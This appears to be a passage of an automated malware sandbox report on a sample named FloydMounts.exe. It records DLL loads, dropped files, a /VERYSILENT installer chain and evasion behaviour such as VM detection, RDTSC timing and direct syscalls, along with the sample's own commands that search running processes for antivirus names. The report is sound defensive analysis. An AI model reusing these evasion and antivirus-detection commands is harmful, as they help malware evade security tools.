              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: msimg32.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: lz32.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: oleacc.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: cabinet.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: cabinet.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: oledlg.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: olepro32.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: twinui.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: pdh.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeSection loaded: shdocvw.dll
              Source: C:\Users\user\Desktop\FloydMounts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpWindow found: window name: TMainFormJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: FloydMounts.exeStatic file information: File size 1391572 > 1048576
              Source: FloydMounts.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: wntdll.pdbUGP source: ulu_mon.exe, 0000002F.00000002.3157412427.0000000004283000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000002.3159720691.00000000045E0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: ulu_mon.exe, 0000002F.00000002.3157412427.0000000004283000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000002.3159720691.00000000045E0000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
              Source: X4PCDQPDT1B8IDPB7SN83.tmp.19.drStatic PE information: real checksum: 0x33908a should be: 0x33ab8c
              Source: X4PCDQPDT1B8IDPB7SN83.tmp.17.drStatic PE information: real checksum: 0x33908a should be: 0x33ab8c
              Source: FloydMounts.exeStatic PE information: real checksum: 0x160af0 should be: 0x16242b
              Source: X4PCDQPDT1B8IDPB7SN83.exe.11.drStatic PE information: section name: .didata
              Source: X4PCDQPDT1B8IDPB7SN83.tmp.17.drStatic PE information: section name: .didata
              Source: X4PCDQPDT1B8IDPB7SN83.tmp.19.drStatic PE information: section name: .didata
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeCode function: 47_2_0052A977 push eax; iretd 47_2_0052A979
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeCode function: 47_2_0052B761 push eax; iretd 47_2_0052B76A
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeCode function: 47_2_0052BD01 push eax; iretd 47_2_0052BD0A
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeCode function: 47_2_0052BB30 pushfd ; iretd 47_2_0052BB33
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeCode function: 47_2_0052A9E1 pushad ; ret 47_2_0052AA2A

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\174436\Produces.comJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HQ019.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7TFI6.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\is-PGV92.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeFile created: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7TFI6.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HQ019.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\174436\Produces.comJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile created: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeFile created: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comSystem information queried: FirmwareTableInformationJump to behavior
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeAPI/Special instruction interceptor: Address: 6C377C44
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeRDTSC instruction interceptor: First address: 6C37F3E1 second address: 6C37F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeRDTSC instruction interceptor: First address: 6C37F3FD second address: 6C37F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F69D8EDC4B5h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F69D8EDC540h 0x00000031 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HQ019.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7TFI6.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7TFI6.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HQ019.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.com TID: 6524Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\174436\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\174436Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000002.2572655913.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000002.2572655913.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeCode function: 47_2_00528A49 mov eax, dword ptr fs:[00000030h]47_2_00528A49
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeNtQuerySystemInformation: Direct from: 0x7B1A2F
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Blvd Blvd.cmd & Blvd.cmdJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 174436Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ContributeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "nightlife" Consultants Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\174436\Produces.com Produces.com UJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe "C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" /VERYSILENTJump to behavior
